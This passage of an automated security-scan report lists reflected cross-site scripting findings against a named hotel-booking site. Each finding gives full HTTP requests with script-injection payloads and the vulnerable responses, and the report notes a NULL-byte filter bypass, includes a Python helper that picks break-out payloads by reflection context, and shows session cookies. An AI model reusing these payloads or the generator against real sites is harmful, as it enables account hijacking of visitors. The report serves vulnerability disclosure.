Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:31:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 145136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11685bb"><script>alert(1)</script>e49ec68931d&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.250. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edca1"><script>alert(1)</script>e498f67dd89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab&edca1"><script>alert(1)</script>e498f67dd89=1 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:37:59 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab&edca1"><script>alert(1)</script>e498f67dd89=1', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.251. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [outDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the outDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e01"><script>alert(1)</script>2e9257ebae9 was submitted in the outDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/1196e01"><script>alert(1)</script>2e9257ebae9&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 145299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/1196e01"><script>alert(1)</script>2e9257ebae9&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.252. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into an HTML comment. The payload bd524--><script>alert(1)</script>896a0a29026 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=16743bd524--><script>alert(1)</script>896a0a29026 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:15:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
===============================
Date: {ts '2011-10-02 19:15:45'}
==========================================================
Page: www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=16743bd524--><script>alert(1)</script>896a0a29026
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...

4.253. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into an HTML comment. The payload 6cb8c--><script>alert(1)</script>ec0a7626931 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=167436cb8c--><script>alert(1)</script>ec0a7626931 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
===============================
Date: {ts '2011-10-02 19:10:26'}
==========================================================
Page: www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=167436cb8c--><script>alert(1)</script>ec0a7626931
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...

4.254. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Impressions.cfm

Issue detail

The value of the Ad_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74230"><script>alert(1)</script>48c0c0576c3 was submitted in the Ad_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. As in 4.253 the reflecting response is a 503 error page; the sink is the AddThis share link, whose onclick handler rebuilds the current URL from the raw query string. The double quote in the payload terminates the onclick attribute itself, so the browser parses the injected <script> element as markup immediately after the <a> tag.

Request

GET /Impressions.cfm?Type=HotelPlannerAd&Ad_ID=1674374230"><script>alert(1)</script>48c0c0576c3 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=1674374230"><script>alert(1)</script>48c0c0576c3', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
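The context judgement the scanner states in each "Issue detail" (HTML comment, double-quoted attribute, text between tags) can be reproduced offline from a response body and the reflected marker. The following Python is an added example; it is not part of the XSS.CX report and not the scanner's own code. The SAMPLES bodies are constructed from the response snippets of findings 4.253, 4.254 and 4.258 (the "<!--" that opens the 4.253 dump is not visible in the snippet and is assumed), and MARKER stands in for the random alphanumeric prefix the scanner submits.

```python
"""Reflection-context classifier: which HTML context did the marker land in?

Added example, not part of the XSS.CX report and not the scanner's own code.
It reproduces the judgement behind the 'Issue detail' paragraphs (HTML
comment, double-quoted attribute, text between tags) by scanning the
response up to the reflected marker with a small state machine.
"""

# Response fragments constructed from the report's snippets; the <!-- opening
# the diagnostic dump in 4.253 is assumed, the report's snippet starts after it.
SAMPLES = {
    "4.253 Ad_ID": ("<html><head><title>Page Not Available</title></head><body><!--\n"
                    "Date: {ts '2011-10-02 19:10:26'}\n"
                    "Page: www.hotelplanner.com/Impressions.cfm?Ad_ID=16743MARKER\n-->"),
    "4.254 Ad_ID": ("<a href=\"/\" onmouseout=\"addthis_close()\" onclick=\"return addthis_open(this, '', "
                    "'http://www.hotelplanner.com/Impressions.cfm?Type=HotelPlannerAd&Ad_ID=1674MARKER', 'x')\">"),
    "4.258 InDate": ("<td align=\"center\" style=\"FONT-SIZE: 18px;\">Boston&nbsp;&nbsp;"
                     "10/04/2011MARKER - 10/07/2011</td>"),
}

# Minimal break-out prefix per context; the report's payloads have this shape
# (e.g. 6cb8c--><script>..., 74230"><script>..., 76afe<script>...).
BREAKOUT_PREFIX = {"text": "", "comment": "-->", "attribute-dq": '">', "attribute-sq": "'>",
                   "attribute-unquoted": ">", "tag": ">", "script": "</script>"}


def classify_reflection(body: str, marker: str) -> str:
    """Context of the first occurrence of `marker` in `body`: one of text, comment,
    script, tag, attribute-dq, attribute-sq, attribute-unquoted, not-found."""
    idx = body.find(marker)
    if idx < 0:
        return "not-found"
    prefix, lower = body[:idx], body[:idx].lower()
    n, i = len(prefix), 0
    state, quote, in_script_tag = "text", None, False
    while i < n:
        if state == "comment":
            end = lower.find("-->", i)
            if end < 0:
                break                            # marker is inside the comment
            i, state = end + 3, "text"
        elif state == "script":
            end = lower.find("</script", i)
            if end < 0:
                break                            # marker is inside script data
            i, state = end, "text"               # tag branch consumes </script>
        elif state == "text":
            if lower.startswith("<!--", i):
                i, state = i + 4, "comment"
            elif lower[i] == "<" and i + 1 < n and (lower[i + 1].isalpha() or lower[i + 1] == "/"):
                in_script_tag = lower.startswith("<script", i)
                i, state = i + 1, "tag"
            else:
                i += 1
        elif state == "tag":
            c = prefix[i]
            i += 1
            if c == ">":
                state = "script" if in_script_tag else "text"
            elif c == "=":                       # attribute value follows
                while i < n and prefix[i].isspace():
                    i += 1
                if i < n and prefix[i] in "\"'":
                    quote, i = prefix[i], i + 1
                else:
                    quote = None
                state = "attr"
        else:                                    # state == "attr"
            c = prefix[i]
            i += 1
            if quote is None and c.isspace():
                state = "tag"
            elif quote is None and c == ">":
                state = "script" if in_script_tag else "text"
            elif c == quote:
                state = "tag"
    if state == "attr":
        return {'"': "attribute-dq", "'": "attribute-sq", None: "attribute-unquoted"}[quote]
    return state


def classify_samples(marker: str = "MARKER") -> dict:
    """Classify every constructed sample above."""
    return {name: classify_reflection(body, marker) for name, body in SAMPLES.items()}


def breakout_payload(body: str, marker: str, probe: str = "<script>alert(1)</script>") -> str:
    """The payload a scanner would send next, given where the marker was reflected."""
    context = classify_reflection(body, marker)
    if context == "not-found":
        raise ValueError("marker was not reflected")
    return BREAKOUT_PREFIX[context] + probe
```

Running classify_samples() yields "comment", "attribute-dq" and "text" for the three samples, and breakout_payload() turns each into the same break-out shape the report's payloads use. The state machine deliberately ignores CDATA-like elements other than script (style, textarea) and entity-encoded markers; a scanner handles those as separate contexts.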

4.255. http://www.hotelplanner.com/Search/Index.cfm [City parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the City request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653d4"><script>alert(1)</script>edda5ccddbf was submitted in the City parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The sink is the same AddThis share link seen in 4.254: its onclick handler embeds the request URL, query string included, inside a single-quoted JavaScript string within a double-quoted attribute, with no encoding for either layer. Every query parameter of /Search/Index.cfm therefore reflects at this one point (the Country, InDate, NumRooms, OutDate and State findings below show the identical line), and one fix to that template closes all of them.

Request

GET /Search/Index.cfm?City=Boston653d4"><script>alert(1)</script>edda5ccddbf&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:15 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:15 GMT;path=/
Vary: Accept-Encoding
Content-Length: 190531


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston653d4"><script>alert(1)</script>edda5ccddbf&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.256. http://www.hotelplanner.com/Search/Index.cfm [Country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the Country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34479"><script>alert(1)</script>e1b66b11f67 was submitted in the Country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States34479"><script>alert(1)</script>e1b66b11f67&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:13:05 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228301


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States34479"><script>alert(1)</script>e1b66b11f67&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.257. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the InDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c95"><script>alert(1)</script>e05fe8cdb05 was submitted in the InDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/201183c95"><script>alert(1)</script>e05fe8cdb05&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
